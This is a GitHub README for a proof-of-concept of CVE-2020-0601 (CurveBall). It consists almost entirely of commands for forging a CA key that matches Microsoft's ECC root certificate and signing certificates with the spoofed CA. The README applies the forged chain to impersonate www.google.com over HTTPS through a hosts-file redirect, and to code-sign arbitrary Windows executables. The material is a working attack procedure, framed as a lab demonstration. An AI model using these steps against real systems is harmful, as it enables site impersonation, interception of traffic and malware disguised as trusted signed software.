JoelBts/CVE-2020-0601_PoC

REQUIREMENTS/SOFTWARE USED


python version 3.11
openssl version 3.1
osslsigncode version 2.5
python libraries imported in gen-key.py and httpServer.py


TLS CERTIFICATE SIGNING


Create a spoofed CA key from the trusted root certificate (must be secp384r1 and in PEM format)

python gen-key.py MicrosoftECCProductRootCertificateAuthority.cer

Create a spoofed CA using the spoofed key

openssl req -new -x509 -key spoofed-ca-key.pem -out spoofed-ca.pem -config ca.cnf

Create another SSL certificate (of any kind) that will be signed by the spoofed CA

openssl ecparam -name secp384r1 -genkey -noout -out cert.key

Create a certificate signing request for the certificate

openssl req -new -key cert.key -out cert.csr -config openssl.cnf -reqexts v3_req

Sign the CSR using the spoofed CA certificate

openssl x509 -req -in cert.csr -CA spoofed-ca.pem -CAkey spoofed-ca-key.pem -CAcreateserial -out cert.crt -days 10000 -extfile openssl.cnf -extensions v3_req

Start an HTTPS server with the spoofed certificate chain

python httpServer.py

ON THE WINDOWS MACHINE

Add <kali.machine.ip> www.google.com to the hosts file (redirects Google to the server)

The certificate should be trusted, and 'Hello World' should be displayed

If an error occurs, check that the system time is correct


CODE SIGNING


Create a spoofed CA key from the trusted root certificate (must be secp384r1 and in PEM format)

python gen-key.py MicrosoftECCProductRootCertificateAuthority.cer

Create a spoofed CA using the spoofed key

openssl req -new -x509 -key spoofed-ca-key.pem -out spoofed-ca.pem -config ca-cs.cnf

Create a new key that can be used for code signing

openssl ecparam -name secp384r1 -genkey -noout -out cert.key

Create a certificate signing request using the key, which we can sign

openssl req -new -key cert.key -out cert.csr -config openssl-cs.cnf -reqexts v3_req

Sign the CSR using the spoofed CA

openssl x509 -req -in cert.csr -CA spoofed-ca.pem -CAkey spoofed-ca-key.pem -CAcreateserial -out cert.crt -days 10000 -extfile openssl-cs.cnf -extensions v3_req

Pack the key, certificate, and spoofed CA into a PKCS12 file for signing exes

openssl pkcs12 -export -in cert.crt -inkey cert.key -certfile spoofed-ca.pem -name "Code Signing" -out cert.p12

Use the PKCS12 file to sign an executable

osslsigncode sign -pkcs12 cert.p12 -n "Signed by curveball" -in filename.exe -out filename_signed.exe

About

Demonstration of CVE-2020-0601, aka CurveBall. Based on the PoCs available at https://github.com/kudelskisecurity/chainoffools and https://github.com/ly4k/CurveBall
